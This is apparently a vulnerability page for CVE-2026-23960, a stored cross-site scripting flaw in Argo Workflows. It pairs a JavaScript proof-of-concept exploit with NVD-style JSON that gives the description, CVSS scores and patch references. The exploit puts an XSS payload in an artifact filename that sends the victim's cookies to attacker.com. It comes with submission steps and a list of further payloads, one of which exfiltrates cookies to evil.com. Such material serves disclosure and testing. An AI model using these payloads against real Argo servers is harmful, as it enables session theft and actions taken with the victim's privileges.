CVE-2026-23960

// CVE-2026-23960 PoC - Stored XSS in Argo Workflows Artifact Listing // This PoC demonstrates how to inject malicious JavaScript through artifact filenames // Step 1: Create a workflow with a crafted artifact filename containing XSS payload const workflowTemplate = { apiVersion: 'argoproj.io/v1alpha1', kind: 'Workflow', metadata: { generateName: 'xss-poc-' }, spec: { entrypoint: 'main', templates: [{ name: 'main', container: { image: 'alpine:latest', command: ['sh', '-c'], args: ['echo "test"'], resources: {} }, outputs: { artifacts: [{ name: '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>', path: '/tmp/output.txt' }] } }] } }; // Step 2: Submit the workflow via Argo API // POST /api/v1/workflows/{namespace} // Authorization: Bearer {token} // Step 3: When victim views artifact list at: // GET /api/v1/artifacts/{namespace}/{workflow}/... // The XSS payload will execute in victim's browser // Alternative simpler payload for testing: const simplePayloads = [ '<script>alert(document.domain)</script>', '<img src=x onerror=alert(1)>', '<svg onload=alert(document.cookie)>', '<body onload=fetch("https://evil.com?"+btoa(document.cookie))>' ];

{"cve": {"id": "CVE-2026-23960", "sourceIdentifier": "[email protected]", "published": "2026-01-21T22:15:50.627", "lastModified": "2026-02-17T16:56:21.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user’s browser under the Argo Server origin, enabling API actions with the victim’s privileges. Versions 3.6.17 and 3.7.8 fix the issue."}, {"lang": "es", "value": "Argo Workflows es un motor de flujo de trabajo de código abierto nativo de contenedores para orquestar trabajos paralelos en Kubernetes. Antes de las versiones 3.6.17 y 3.7.8, un XSS almacenado en el listado del directorio de artefactos permite a cualquier autor de flujo de trabajo ejecutar JavaScript arbitrario en el navegador de otro usuario bajo el origen del servidor Argo, lo que permite acciones de API con los privilegios de la víctima. Las versiones 3.6.17 y 3.7.8 solucionan el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*", "versionEndExcluding": "3.6.17", "matchCriteriaId": "FBACAF34-13D0-430F-8730-7613ADFE12D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:argoproj:argo_workflows:*:*:*:*:*:go:*:*", "versionStartIncluding": "3.7.0", "versionEndExcluding": "3.7.8", "matchCriteriaId": "FBAC2E34-63C4-4F95-821A-4159E1B8300E"}]}]}], "references": [{"url": "https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}